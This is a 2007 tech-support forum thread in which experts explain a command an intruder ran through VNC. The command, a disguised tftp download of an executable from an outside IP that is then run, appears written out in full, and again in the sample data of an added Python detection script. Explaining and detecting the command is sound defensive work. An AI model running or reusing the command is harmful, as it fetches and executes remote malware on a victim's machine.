Solved

What is this cmdline attempting to do?

Posted on 2007-11-27
Last Modified: 2013-11-16
Hi,

We recently had a PC hacked via Real VNC. The hacker executed the following command line.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&

Can anyone explain what this has done?

Regards

Rob
Question by:ertnev74
8 Comments
 
LVL 40

Accepted Solution

by:
Richard Quadling earned 1400 total points
ID: 20357105
%comspec%

This is telling the computer to run the command shell as identified by %COMSPEC%.

At the DOS prompt type SET, press Enter, and you will see COMSPEC.
Normally cmd.exe or (older Windows) command.com.

/c

Tells the comspec to run a command and then quit.

echo Repairing user32.dll

Output to the screen.

&
echo Please wait...

Output to the screen.

tftp -i 81.88.110.178 GET cffhvvct.exe

Use the program tftp to get a file called cffhvvct.exe from the IP address 81.88.110.178.

start cffhvvct

Run the program just downloaded.

If you don't know the name of the program or the FTP site, don't run it.

I've just tried downloading the file from that site but it timed out.

If it was a virus, then the site may have been blocked or something else.
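An added illustration, not part of this thread or of any commenter's answer: a small Python script that does mechanically what the walk-through above does by hand. It splits a cmd.exe /c chain on its separators and flags the fetch-then-run pattern (a tftp GET followed by a sub-command that starts the fetched file), which is what a detection rule over process-creation logs would look for. It generalises slightly beyond the question's line: it also understands &&, || and | as separators, a full path to cmd.exe as the launcher, and tftp's optional destination file name. The only real input is the command line quoted in the question; the other sample records are constructed, and the DOWNLOADERS and SHELLS sets are assumptions to be extended for your own estate.

```python
"""Split a cmd.exe /c command chain and flag download-then-execute.

Added example for this thread. The first sample record is the command line
quoted in the question; the rest are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# cmd.exe joins commands with & (unconditional), && (run if the previous
# command succeeded), || (run if it failed) and | (pipe). Quoting and ^
# escaping are ignored here to keep the splitter short.
SEPARATOR_RE = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")

# Shell launchers as they appear in process-creation records (extension and
# path stripped) and the switches that make the shell run one command line.
SHELLS = {"cmd", "command", "%comspec%"}          # assumption: extend as needed
RUN_SWITCHES = {"/c", "/k"}

# Transfer tools that take "<host> GET <file>" on their command line.
# tftp is the one in the question; extending the set is an assumption.
DOWNLOADERS = {"tftp"}

# Constructed process-creation records; the first is the question's own line.
SAMPLE_COMMAND_LINES = [
    "%comspec% /c echo Repairing user32.dll & echo Please wait... & "
    "tftp -i 81.88.110.178 GET cffhvvct.exe & start cffhvvct&",
    r"C:\Windows\System32\cmd.exe /c dir C:\Users & echo done",
    "cmd.exe /c tftp -i 10.0.0.5 GET update.exe svc.exe && svc.exe",
    "cmd /c echo hello",
]


@dataclass
class Finding:
    source: str      # host the file was fetched from
    fetched: str     # name the file was saved under
    executed: bool   # a later sub-command runs that file


def _basename(token: str) -> str:
    """Lower-case file name without path or extension ('C:\\x\\cmd.exe' -> 'cmd')."""
    name = token.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[0].lower()


def split_chain(cmdline: str) -> List[str]:
    """Return the non-empty sub-commands of a cmd.exe /c (or /k) chain."""
    parts = cmdline.strip().split(None, 2)   # launcher, switch, rest of line
    if (len(parts) == 3 and _basename(parts[0]) in SHELLS
            and parts[1].lower() in RUN_SWITCHES):
        body = parts[2]
    else:
        body = cmdline                        # no shell wrapper: whole line is the chain
    return [p for p in SEPARATOR_RE.split(body) if p.strip()]


def analyse(cmdline: str) -> Optional[Finding]:
    """Flag a chain that fetches a file with a transfer tool and then runs it."""
    subs = split_chain(cmdline)
    for i, sub in enumerate(subs):
        toks = sub.split()
        if not toks or _basename(toks[0]) not in DOWNLOADERS:
            continue
        # tftp [-i] <host> GET <source> [<destination>]
        args = [t for t in toks[1:] if not t.startswith("-")]
        if len(args) < 3 or args[1].upper() != "GET":
            continue
        host = args[0]
        saved_as = args[3] if len(args) > 3 else args[2]
        target = _basename(saved_as)
        # 'start cffhvvct' matches 'cffhvvct.exe' once extensions are stripped.
        executed = any(target in {_basename(t) for t in later.split()}
                       for later in subs[i + 1:])
        return Finding(host, saved_as, executed)
    return None


def scan(records: List[str]) -> List[Finding]:
    """Run analyse() over a batch of command lines and keep only the hits."""
    return [f for f in (analyse(r) for r in records) if f is not None]


if __name__ == "__main__":
    for rec in SAMPLE_COMMAND_LINES:
        hit = analyse(rec)
        verdict = f"ALERT fetch+run from {hit.source}" if hit and hit.executed else "ok"
        print(f"{verdict:>35} | {rec[:60]}")
```

Running it prints one line per record; the question's line and the constructed && record are reported as fetch-and-run, the other two as ok. The same analyse() function can be pointed at the CommandLine field of process-creation events instead of the embedded samples.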
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 400 total points
ID: 20357113
Dear ertnev74,

A few weeks ago I got the same issue via VNC. It basically tries to dump 1.exe or 2.exe, which is a trojan. Basically, search the computer for the virus and try to search for 1.exe.

You can manually end the process, rename it and later delete it.

Run good antivirus software like Window Live Care or E-Wido.

Read some more info:
http://en.wikipedia.org/wiki/ComSpec
http://www.liutilities.com/products/wintaskspro/processlibrary/1/
 
LVL 40

Assisted Solution

by:Richard Quadling
Richard Quadling earned 1400 total points
ID: 20357123
OK. Having read the question again.

Without having access to the program itself, absolutely ANYTHING could have happened.

I would STRONGLY recommend disconnecting the PC from the LAN and running virus scanners and rootkit scanners.

Sysinternals Process Explorer (to see what is currently running and make sure YOU know it should be running).
Sysinternals RootkitRevealer (to see if any rootkits exist).
Sysinternals Autoruns (to see what is launched when the computer is turned on or when you log in).
HijackThis is a similar program to Autoruns, but produces a report which others can look at (http://www.spywareinfo.com/~merijn/programs.php).
 
LVL 47

Assisted Solution

by:rpggamergirl
rpggamergirl earned 200 total points
ID: 20357538
You could also try running some free scanners.
SUPERAntispyware:
http://www.superantispyware.com/

Download and install DrWebCureIt
http://www.freedrweb.com/

AVG Antispyware:
http://free.grisoft.com/doc/download-free-anti-spyware/us/frt/0


OR, run Combofix and upload the log for us to check.
Download ComboFix to your Desktop, from either of these locations:
http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe
http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Double click "combofix.exe" and follow the prompts.
When finished, it shall produce a log for you.
Upload the log at EE-Stuff.com for us to check please.
 
LVL 6

Assisted Solution

by:kamleshgwalani
kamleshgwalani earned 400 total points
ID: 20357582
Sorry, forgot to mention: always make sure that your firewall is turned on.
Or VNC should only be enabled as and when required.
If you can change the default port, i.e. 5900, to some other port, that would be helpful too, as this port is well known by hackers, so they just scan the port and enter through it.
I needed this same thing with our guys and it solved my problem.

Now, since the program has been executed on your machine, better run a virus/spyware/trojan scan and then do the needful as above.
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20357691
So what's the problem? Were you able to find 1.exe?
 

Author Comment

by:ertnev74
ID: 20358036
All, thanks for your assistance with this query.

The user saw some activity on his screen last Thursday around midday. I advised him to shut off his router. When I got to his PC he explained what he had seen. Clicking on Start > Run I found the above cmdline.

I looked up 'VNC being hacked' on EE and found a few solutions to rectify the situation. Once I had made the box secure by running spyware / AV / process scanners, I then looked at the cause and possible damage.
The cmdline was the only thing I didn't understand.... but I do now :)

The AV scan removed a few trojans and viruses so I'm not too sure if 1.exe was on the box, however I was able to trace the IP of the hacker back to America.

Thanks again.
 
LVL 6

Expert Comment

by:kamleshgwalani
ID: 20359640
Thanks for the valuable feedback. The best is to keep your Windows firewall ON and keep Windows patched!
